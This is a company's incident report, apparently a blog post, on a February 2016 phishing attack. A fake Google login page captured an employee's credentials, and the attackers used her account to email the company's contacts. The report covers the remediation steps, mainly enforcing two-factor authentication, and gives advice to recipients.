This morning (19 February 2016 at 07:24), a Pragmatic email account was used to send a malicious email to the contacts in their address book entitled “Pragmatic”.
Note the link (labelled ‘1’) “Download / view” and what appears to be an attached PDF “doc01108220150902100035.pdf” (labelled ‘2’). The ‘PDF’ (2) is actually just an embedded image that links to the same URL as the text link (1).
How did the breach happen?
On 18 February 2016 at 06:02, an employee received an email (almost exactly the same as the one above).
At some point before 09:18, the employee clicked one of the links in that email and was taken to a page that misrepresented itself to be a Google login screen. She entered their Google login details but was presented with an error message so the employee closed the browser window and contacted the recipient to notify them that the employee couldn’t access the file.
By entering their Google login details into the malicious web page, their account details were compromised. The attackers then used their details to log into their account at 19 February 2016 at 07:23 and send the malicious email out to their address book contacts – almost certainly using an automated tool. We traced the access to a Virgin Media IP in the UK but that’s probably just an infected computer or other proxy.
What steps did we take?
Within 21 minutes we had:
- Reset the employee’s Google Apps password
- Contacted all recipients of the original email asking them to disregard and delete the malicious email
- Checked the employee’s Google Apps security settings to examine compliance with our security policy
- We reviewed our Google Apps security policies and enforced the use of Two Factor Authentication (2FA) across all new and existing user accounts (including the employee’s). Our internal policies had previously specified but not enforced 2FA and in this case it looks like human error that the employee’s account was set up without having 2FA turned on. If 2FA had been turned on, the credentials compromise would have been a security breach but it wouldn’t have allowed the attackers to login unless they also had access to their 2FA codes/devices.
- We reset the employee’s passwords across all key services and ensured all passwords are unique to each service
- We signed the employee’s Google account out of all other web sessions just in case
- We’ve audited the employee’s account activity log
- We checked over the employee’s account to ensure that she could safely send/receive email (thanks to this blog post for a tip to remove a cleverly-designed filter: )
- We’ll use this breach as an opportunity to help our team learn how to spot Phishing emails (there’s some good advice here.)
- We’ll be protected by Google’s 2FA
- We’ll identify other services where 2FA is available and enforce its use
- We’ll review our security policy to ensure there’s nothing more we can do
What information was compromised?
At this point we don’t believe that the compromised credentials were used for anything other than to send the phishing email above. The attackers had access to their account for less than 30 minutes. Her Google account doesn’t give her access to any key business systems or customer data beyond the contents of her email account inbox and address book.
What should you do?
Unless you followed the malicious link and entered valid Google login details into the form, we don’t think there’s any risk to your computer or accounts. You should always maintain effective computer security systems like antivirus and password management tools.
If you did enter your account details, please follow Google’s guide here.
We’re extremely sorry for any inconvenience caused. We hope this report and analysis re-assures you that we care deeply about security and have taken steps to enhance our security posture going forwards.